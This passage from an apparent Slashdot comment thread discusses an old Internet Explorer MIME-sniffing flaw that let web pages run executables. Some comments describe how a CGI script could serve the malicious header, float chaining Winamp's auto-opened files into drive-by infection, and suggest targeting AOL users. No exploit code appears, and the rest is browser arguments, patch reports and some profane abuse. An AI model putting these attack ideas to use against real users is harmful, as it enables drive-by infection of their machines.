    Because it's part of the Windows OS. When grandma goes out to buy herself a nice Dell computer, it comes with Windows preinstalled, and hence has IE installed by default. She would have to take extra steps to download and install a different browser. But why, when IE seems perfectly fine, and it's integrated so nicely into the desktop? And it's hard to argue that. Think of the average home user that isn't as aware of these issues as we are.

    But don't you see? This security hole is the solution. The exploit can be used to install another browser. This bug should remain unpatched as part of the settlement in the Microsoft case.

  333. How IE MIME types are determined. by ROBOKATZ · · Score: 2, Informative
    MSDN Link Here

    Basically, the first 256 bytes of the file are scanned, and compared with the Content-Type header. If the two results do not agree, the scanned type is used. If the scanned type is ambiguous, and the file is binary, then the user is prompted to save or execute the file. If the file is text, it is displayed.

    Now, can someone explain what is wrong with these instructions that would cause executable content to be automatically executed? The text even gives an example of a file extension of .DLL and .BAT, and how those would be handled.

  334. Security through obscurity == Media coverage later by BMIComp · · Score: 2

    If history repeats itself, I think this is how it will happen. Microsoft may release a bugfix in the next few months. However, they won't publicize it much, partially due to the fact that they don't even think it's a bug. Eventually, i'd say three months later, a virus creator stumbles along this bug, makes a virus like code red, and then it gets big media coverage, while everyone tries to patcht their systems.

  335. example by binford2k · · Score: 1

    This readme describes how the vulnerability works.

    No, really it will download and execute calc.exe from a Win98SE install. Of course, since it could be any program, including trojans or viruses you'd have to trust me. Doesn't that suck ;)

    http://donkeynuts.org/readme.txt

  336. Just check out glrotate's history to find out... by Lawmeister · · Score: 2

    how big an idiot he really is.

    glrotate

    sure would be nice to have a squelch command for some users.

  337. IE by towaz · · Score: 1

    People should know IE will always be insecure....Thats why I went back to Nutscrape but i guess it only has a slightly smaller amount of security issues.

    --
    "I disapprove of what you say, but I will defend to the death your right to say it." - Voltaire
  338. Re:Uhm.... IE5 doesn't seem vunerable to that eith by arkanes · · Score: 1

    Well, with IE 5.5sp2(NT4.0), the vulnerability works exactly as described in the article.

  339. Re:Now that this particular cat is out of the bag. by Anonymous Coward · · Score: 0

    What crackhead moderator labeled this as "informative"?!

  340. Hard to be amazed.... by Anonymous Coward · · Score: 0

    It continues to amaze me that MS products are being used in shops more and more every day where security is even remotely an issue. Not to mention any federal government agencies. I'm nearly convinced that there is no hope and that most IT departments are led by brainwashed invalids who should be fired for incompetence. In fact any IT manager who continues to put out MS products on corporate desktops, knowing the track record in the "non-security area", should be brought up on criminal neglect charges. They should have to pay damages for every virus that enters their company through one of the many open doors in the MS software that are left wide open without concern.

    I realized MCSEs are a dime-a-dozen but I have to think at least *some* of them have the capacity to be retrained and put to better use than chasing the rabbit around the dog track.

  341. Fix the problem, switch browsers by jhines0042 · · Score: 1

    I've actually been hit with some virii spread in e-mail because of MS Exchange automatically viewing the file as HTML. The "re-typed" content type is often of the music variety ".wav" with an executable payload that does malicious things.

    Thankfully I have the security screws tightened down as far as they go in MS Exchange and the virii have never done anything to my computer or spread beyond me. (At least to the best of my knowledge)

    --
    42 - So long and thanks for all the fish.
  342. Re:Now that this particular cat is out of the bag. by bughunter · · Score: 2
    Har, har! It's safe to make a joke like that in a forum where people can reasonably be expected to know it's a joke, but be careful!

    Novice users will take you literally. It happened to me.

    My first month on the job, for an employer who made us peons use communal banks of PCs. Someone two seats away was running WordPerfect 5.1, and asked me "How do I save this file?"

    I answered "Control Alt Delete," and before I could stop her, she'd rebooted her machine.

    But of course, IE isn't software for productive work...

    --
    I can see the fnords!
  343. not that the thought will get me into heaven... by dagashi · · Score: 1

    ...but sometimes I fantasize about someone writing a really really mean, evil microsoft virus from hell so people understand what's really at stake here.
    I mean we're talking billions of billions of billions of billions... ...of billions of money!

  344. Re:Try this at home (or "not just a threat, also a by epsalon · · Score: 2

    Try this too:
    If a page is called '.txt' and mime-type is text/plain, MSIE will *still* treat it as HTML, if it "looks like" HTML source.

    See this for example, or if you want to be naughtier, try this for a crash.

  345. Not again.... by lee1 · · Score: 1

    This keeps happening to me. I'm driving and a report on a new, horrible "computer virus" starts coming over the radio....or I see a scary article in the newspaper on how evil "hackers" can take over my computer just by sending me an email. Naturally, I am all ears (or eyes). Then, at the end of the piece, I am scratching my head. What was that about? Then it hits me - this is only about Windows machines, nothing to do with me. They didn't say so, because for these computer "journalists," "computer" means "computer running Windows." And further, although I know little about that particular operating system, I know that the so-called security hole just doesn't exist for users who have simply turned off the automatic execution of scripts, and who do not respond to invitations to run programs that they have not installed themselves by clicking "Sure!". I use Internet Explorer, at times, on my Macs, and I know there is a supposed similar "vulnerability," but I'm not worried, because I've set it, as well as any other browser I might use, to not post-process files. All of these hand-wringing articles give the impression that there is little the poor user can do, at least until some commercial virus protection software is updated. They never mention that he can either stop using Windows, or learn how to use it intelligently. My point? I thought the articles about computer-related subjects on Slashdot were supposed to be a bit more sophisticated than what you might find in a newspaper.

  346. I agree with you by ColGraff · · Score: 2

    "Computer illiteracy is usually not about a lack of skill, but a fear that it is impossible to learn a computer skill. It is an acquired behavior."

    Agreed, but it's damn hard to get people to unlearn that fear. And that's the problem.

    --
    I'm the stranger...posting to /.
  347. Yeah, actually you do by Shadarr · · Score: 1

    I use Netscape 4.7 at home and Mozilla at work. But I have to have IE installed and configured on both boxes because there are sites which don't work in those browsers. Some of them just plain won't render the page, instead saying "Document: Done" while displaying a blank page. One of those sites was done in PHP ferchrissake.

  348. And then you give a link to a WU-FTP exploit... by Brendan+Byrd · · Score: 1

    Please...Wu-FTP is flawed all over the place. I think most of the distros have already given up on it because it's too slow to give out the patchs and there's too many buggy routines (which return root-exploit after root-exploit).

    And you can't really blame "Linux" in general over a third-party application's buggy code. As for Windows, it is indeed Microsoft who controls and maintains the code. Not to say that the open-source community doesn't run into its own serious bugs, but in general, we tend to report them a lot faster than the MS crew.

  349. Bill Gates' Genitals by Anonymous Coward · · Score: 0

    How do you think they got the name "Microsoft?"

  350. HMMMMMM by Anonymous Coward · · Score: 0

    Oh when Mozilla & Opera had security holes in previous builds, SlashFuckheads didnt report it nor they didnt report any security holes within CDE/Solaris platform when I posted the news. These slashfukkers are biased cunts and fuck you guys all to hell. Try and be open minded and not attack Microsoft All The TIME!!!!! You think that Bill Gates-Borg icon is funny, its getting tiresome and grow up!! If you want to generalize and be pig headed, I notice all the Linux students at my University look like Cowboy Neal -- TOTAL FAT FUCKERS with no life!! Why not use Cowboy Neal with that fuckin Tux Hat as an icon for Linux News you bitches!!!! http://www.cowboyneal.org/ Check out the LOSER!

  351. Re:In related news...printing by Anonymous Coward · · Score: 0

    No, it doesn't. I just printed something from opera, default settings, and it came out fine. I'm using version 6 on win2k.

  352. IE is evil by BattyMan · · Score: 1

    Microsoft may not have won the browser market fairly, but that doesnt take away from IE's strength.

    Yes, it does. Certainly in my opinion at least.

    You cannot claim victory when the referees have thrown down the penalty flags against you.

    And IE has NO "strength" whatsoever on the Linux platform since it does not run there. In order to even be eligible for the distinction "WWW's Greatest Browser(tm)" you simply _have_ to be cross-platform. Cross-platform functionality is the foundation of the Internet.

    IE violates this. It is therefore NOT the Web's Greatest Browser no matter how many people buy computers with it preinstalled.

    --
    Exceeding the recommended torque is not recommended.
    1. Re:IE is evil by whereiswaldo · · Score: 1

      Now there's an often missed point that is absolutely true.
      It's the reason there even _are_ standards. If everyone ran Windows, would there be a need for standards? Not really. Fortunately, everyone doesn't run Windows, and more people every day are switching to something else.
      It's a revolution, I tell ya. And it has started.

  353. Ultimate virus by Anonymous Coward · · Score: 0

    I just hope that anybody doesn't remember to
    create an hybrid virus that spreads using both
    IE browsers and IIS servers, exploiting this
    fail and the ones from code-red/nimba/etc.

    Just imagine a code-red like virus that posts
    web pages in hundreds of unpatched websites containing another virus that would attack IE browsers, that would spread again to IIS servers that would spread...

    1. Re:Ultimate virus by nickms85 · · Score: 0

      woah woah, sounds like a terrorist to me!

      eh Mr. Ashcroft?

      --

      Lose your virginity to reply.....
  354. Searching for it in the wild by Bakajin · · Score: 1
    I'd say the odds are pretty good that this is already being exploited in the wild.

    Couldn't a webcrawler be taught to search for this exploit in the wild?

  355. silly PHP question by Slur · · Score: 1

    Just curious why you would choose to write a temporary local file when you could just use "print $content" where it says "fopen... fpassthru..."?

    --
    -- thinkyhead software and media
  356. What about Winamp's WSZs on Windows? by 412-613-8636 · · Score: 1

    Winamp is probably one of the most commonly used pieces of Windows software available. And might I point out, that it adds a mime type (or something) to windows' system that tells windows to automatically open the document when finished.

    I tested it myself, I have Xitami on my Windoze machine, and renamed a binary to test.wsz. It downloaded and opened automatically (so fast I couldn't have canceled had I wanted to; but that's cause i was downloading from my own machine, but it's very possible to make it run by fast even on a remote server, especially if you target a broadband user.) Now since it opened to Winamp it obviously wasn't executed (just seemed to cause winamp to refresh its display.)

    But I wonder, could there be a way to combined these two? Then the victims wouldn't have to do anything except load your page. Everything else could be made to happen so quickly they may not even notice!

  357. continued... by 412-613-8636 · · Score: 1

    Also when downloading a WSZ file, you aren't even prompted to do any of the following:

    Whether or not to open
    Where to save it
    What it should be named
    Or to close the download dialog automatically

    Obviously a person could write a very small binary and download it to a persons's computer in seconds. It still has to be determined if a binary can be executed this way though

  358. AOL and CS2k by 412-613-8636 · · Score: 1

    These two ISPs have those gay interfaces that load up content using MSIE automatically. Almost everyone who uses those services just browses within the AOL / CS2K window, which is just a wrapper for MSIE, AIM, their email client, etc.

    Those users are pretty much fucked. I suppose if you're a hacker you know who to target now.

  359. I had already tried that. by autopr0n · · Score: 2

    With text/plain it simply treated it like a normal .exe file. (asked if I wanted to save/open whatever)

    --
    autopr0n is like, down and stuff.
  360. Are you ready for the kicker? ... by QuadGoatBoy · · Score: 1

    Opera 5.12 is also vulnerable. Check the following link: http://www.securityfocus.com/archive/1/244953 If you already have 6.0, then you should be safe, but apparently, the same is true of IE 6.0, which has been quite thoroughly tested and does show the appropriate .exe on the second dialog. Sorry if this information is redundant, but obviously, someone did not see it. Apparently, this security vulnerability has been known by the IE and Opera gang for a while, or why do you think that the 6.0 versions would have already solved the problems? QuadGoatBoy "I have lost many friends to the squirrels..."

  361. Oh please yourself. by autopr0n · · Score: 2

    No one paid for netscape.

    --
    autopr0n is like, down and stuff.
    1. Re:Oh please yourself. by deaddrunk · · Score: 1

      Lots of people paid for Netscape Navigator, that was the foundation of their business.Perhaps you've been asleep for the past 3 years.

      --
      Does a Christian soccer team even need a goalkeeper?
  362. Re:Content-Type flag for Excel by ShriekingEel · · Score: 1

    Perfect timing! I was just wondering how to "write" an Excel file & send it to a browser.

    The actual content-type flag is "application/vnd.ms-excel"

    Thanks!
    Eel

  363. Well, that's what we do here. by BattyMan · · Score: 1

    This sensationalized story is nothing more than Microsoft-bashing.

    --
    Exceeding the recommended torque is not recommended.
  364. Re:Now that this particular cat is out of the bag. by dsb3 · · Score: 1

    That wasn't a joke. :-)

    --

    Slashdot? Oh, I just read it for the articles.
  365. But why do we TOTALLY shelter the developers? by BattyMan · · Score: 1

    Really, READ the EULA, any EULA.
    As things stand now it's totally one-sided:
    You have the right to PAY for "the software". That's all. Don't expect it to run. You're responsible for installing it correctly and making it work for you, but you're not allowed to reverse engineer the program and fix it if it doesn't work right. You also have the right to pay for the lawyers if the developer decides to come after you for any reason, no matter what the outcome of the action. The developer has the right to snoop around your system to make sure you have a legitimate license and disable any of his software which he thinks you haven't legally obtained. If this shuts down your business and you lose $100,000/diem for the 2 days it takes you to cut a deal with his salesman and the 3 days it takes to reinstall his software, too bad. If you can come up with the receipts to PROVE you've paid, you still have no legal recourse against the developer. If you badmouth the developer because he shut down your paid-for software until you exercised your right to PAY a second time, or because his crapware is a piece of shit, you're in violation of the EULA, and you're paying for the lawyers he'll send after you!
    </RANT>

    If the goalies & the pitchers got to make up ALL the rules, no one would ever score!

    We need some middle ground.
    Maybe if the developers were responsible for treble the retail price of their software. A little guy wouldn't be burned at the stake if somebody's business went down the drain, FREE software would be left out because it's retail price is $0, but the Empire might take a hit in the class-action suits that vulnerabilities of the magnitude being discussed here would cause.
    Imagine the Empire being made to refund $550/copy for a million copies of software that were found vulnerable to a virus that deleted all data from the customers' disks. That might put a crimp in their monopoly. It would _certainly_ give FREE software a chance on the desktop!

    --
    Exceeding the recommended torque is not recommended.
  366. My reply - due to the MAJOR Newsbytes inaccuracy by Hyped01 · · Score: 1
    I sent this to Newsbytes Tuesday - no response yet.

    To: Chris Wysopal
    Re: Recent comment to newsbytes and other news services.
    http://www.newsbytes.com/news/01/172878.html

    In a statement attributed to you on newsbytes, they claim you said that malicious hackers would need control of an httpd server to use this exploit. This is very untrue. Using this exploit is far simpler than that.

    All a malicious hacker would need is a normal web account with any ISP. Normal web accounts generally allow cgi-bin access for that account. A simple cgi script could utilize this exploit, as all cgi scripts that communicate with tbe browser, by design, should send headers. This isnt usually *necessary* as most web servers generally will create the header as needed (assuming it understands the content generated by the cgi script), but is how cgi works.

    If, for example, you have ever been to a site where an image is being displayed as plain text, or a download of an exe file or zip file or other understood format is garbled, *when those files are sent via script*, it is often because the script creator forgot to send a header before the data and the web server treats and sends the file as plain text.

    Thus, to use this exploit, anyone with a real, full web account with any decent ISP would simply need some scripting knowledge (being a "malicious hacker" sort of implies that), and knowledge of the appropriate header to send.

    Our best,
    Robert

    cc: SlashDot
    NewsBytes/Brian McWilliams

    --

    WebMaster:
    BinFeeds
    XXX Thumbnailed Image Newsgroups but

  367. Prove it by rossy · · Score: 1

    I want someone to post the link where if I browse to the link http://www.xxx.xxx/blah.htm I get a new file created on my disk. I challange anyone to create such a link to exploit this security hole that would create the file slashdot.txt in C:/tmp (OK you don't have to create the directory too). I leave this as an exercise for the student. IF someone is bright enough to create this link, I would be happy to go there and verify that this is a bug. In the meantime, I'm using Opera. This would do more to support the bug weakness than any of these posts.

    --
    Ross Youngblood
  368. there is a patch available by utunga · · Score: 1

    Oh, OK, sure, flame me into karma hell
    but isn't this a patch?



    --
    greenpeace++

  369. There IS a fix available by Pakaran2 · · Score: 1

    For those who aren't aware, MS does have a fix available for this problem. Their remark about not considering it a problem apparently applied to an earlier, less severe, version of the problem, which didn't allow random programs to be run without notice.

    The fix, which was posted on December 13 (yes, almost a week ago, and before this article was posted), is located at http://www.microsoft.com/technet/security/bulletin /MS01-058.asp

  370. I tried their 'patch' on two computers.... :( by Newer+Guy · · Score: 1

    One had IE 5.5 SP2 and one IE6. When I tried to run the 5.5 SP2 patch on the IE 5.5 SP2 computer I got a message which said: "This patch will only work with the SP2 version of Internet Explorer 5.5". DOH!!! The IE 6 patch installed on the IE 6 computer, but now Internet Explorer crashes continually! And..you can't uninstall these patches either. So...apply these patches with caution. Looks like Microsoft has DONE IT AGAIN!!!

  371. Flaimbait by SL33Z3 · · Score: 1

    It's so hard to find good flaimbait in the form of a story these days... oh wait. not on slashdot. The "story", if you want to call it one, is riddled with assumptions. I'm tired of people attacking Microsoft as if it were just some entity that they didn't like. Bill Gates is not an evil monster and Microsoft is not the evil empire everyone here for some reason wants them to be. These are people who have ideas about how things should be. Good for them for bucking the system!

    --
    SL33ZE - Artificial Intelligence is No Match For Natural Stupidity -
  372. hehehe - IE Lovers! I use Nestcape!!! by Anonymous Coward · · Score: 0

    No troubles with that un!